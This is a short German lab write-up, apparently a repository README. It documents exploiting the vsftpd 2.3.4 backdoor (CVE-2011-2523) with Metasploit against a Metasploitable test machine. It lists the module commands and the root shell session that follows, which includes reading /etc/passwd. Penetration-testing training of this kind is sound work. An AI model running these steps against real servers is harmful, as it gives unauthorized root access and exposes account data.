
Schwachstellenbewertung und Ausnutzung von vsftpd 2.3.4 (CVE-2011-2523) mit Metasploit. Vollständiger Bericht und Nachweis des Root-Zugriffs enthalten.
Ausnutzung einer bekannten Schwachstelle in
vsftpd 2.3.4mit Metasploit.
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 enthält eine bösartige Hintertür, die eine Befehlsshell auf Port 6200 öffnet, wenn ein speziell gestalteter Benutzername (endend auf :)) empfangen wird.
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
Root-Shell-Zugriff gibt dem Angreifer vollständige Kontrolle über das Zielsystem — einschließlich Privilegieneskalation, lateraler Bewegung, Datenerfassung und dauerhaftem Zugriff.
📝 Vollständiger PDF-Bericht in diesem Repository: vsftpd-exploit-report.pdf
Erstellt mit 🔥 von vedpakhare